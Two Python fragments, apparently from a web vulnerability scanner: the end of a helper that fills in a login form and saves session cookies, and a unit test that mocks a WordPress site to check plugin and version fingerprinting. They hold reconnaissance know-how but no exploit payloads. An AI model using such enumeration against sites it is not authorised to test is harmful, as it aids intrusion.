print("{0}) {1}".format(i, form)) forms.append(form) ok = False if forms: nchoice = -1 print('') while not ok: choice = input(_("Enter a number : ")) if choice.isdigit(): nchoice = int(choice) if len(forms) > nchoice >= 0: ok = True elif choice == 'q': break if ok: form = forms[nchoice] print('') print(_("Please enter values for the following form: ")) print(_("url = {0}").format(form.url)) post_params = form.post_params for i, kv in enumerate(post_params): field, value = kv if value: new_value = input(field + " (" + value + ") : ") else: new_value = input("{}: ".format(field)) post_params[i] = [field, new_value] request = Request(form.url, post_params=post_params) crawler.send(request, follow_redirects=True) jc.addcookies(crawler.session_cookies) else: request = Request(args.url, post_params=args.data) crawler.send(request, follow_redirects=True) jc.addcookies(crawler.session_cookies) jc.dump() jc.close()
async def test_plugin(): # Response to tell that Wordpress is used respx.get("http://perdu.com/").mock( return_value=httpx.Response( 200, text="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \ <h2>Pas de panique, on va wordpress vous aider</h2> \ Wordpress wordpress WordPress\ <strong><pre> * <----- vous êtes ici</pre></strong></body></html>" ) ) # Response for versioned plugin respx.get("http://perdu.com/wp-content/plugins/bbpress/readme.txt").mock( return_value=httpx.Response( 200, text="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \ <h2>Pas de panique, on va wordpress vous aider</h2> \ Wordpress wordpress WordPress\ Stable tag: 2.6.6 \ <strong><pre> * <----- vous êtes ici</pre></strong></body></html>" ) ) # Response for plugin detected without version (403 forbiden response) respx.get("http://perdu.com/wp-content/plugins/wp-reset/readme.txt").mock( return_value=httpx.Response( 403, text="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \ <h2>Pas de panique, on va wordpress vous aider</h2> \ Wordpress wordpress WordPress\ Stable tag: 9.5.1 \ <strong><pre> * <----- vous êtes ici</pre></strong></body></html>" ) ) # Response for bad format readme.txt of plugin respx.get("http://perdu.com/wp-content/plugins/unyson/readme.txt").mock( return_value=httpx.Response( 200, text="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \ <h2>Pas de panique, on va wordpress vous aider</h2> \ Wordpress wordpress WordPress\ Version Tested : 4.5 \ <strong><pre> * <----- vous êtes ici</pre></strong></body></html>" ) ) respx.get(url__regex=r"http://perdu.com/wp-content/plugins/.*?/readme.txt").mock(return_value=httpx.Response(404)) respx.get(url__regex=r"http://perdu.com/wp-content/themes/.*?/readme.txt").mock(return_value=httpx.Response(404)) respx.get(url__regex=r"http://perdu.com/.*?").mock(return_value=httpx.Response(404)) persister = AsyncMock() request = Request("http://perdu.com") request.path_id = 1 crawler = AsyncCrawler("http://perdu.com") options = {"timeout": 10, "level": 2} module = ModuleWpEnum(crawler, persister, options, Event()) await module.attack(request) assert persister.add_payload.call_count assert persister.add_payload.call_args_list[0][1]["module"] == "wp_enum" assert persister.add_payload.call_args_list[0][1]["category"] == _("Fingerprint web technology") assert persister.add_payload.call_args_list[0][1]["info"] == ( '{"name": "bbpress", "versions": ["2.6.6"], "categories": ["WordPress plugins"]}' ) assert persister.add_payload.call_args_list[1][1]["info"] == ( '{"name": "wp-reset", "versions": [""], "categories": ["WordPress plugins"]}' ) assert persister.add_payload.call_args_list[2][1]["info"] == ( '{"name": "unyson", "versions": [""], "categories": ["WordPress plugins"]}' ) await crawler.close()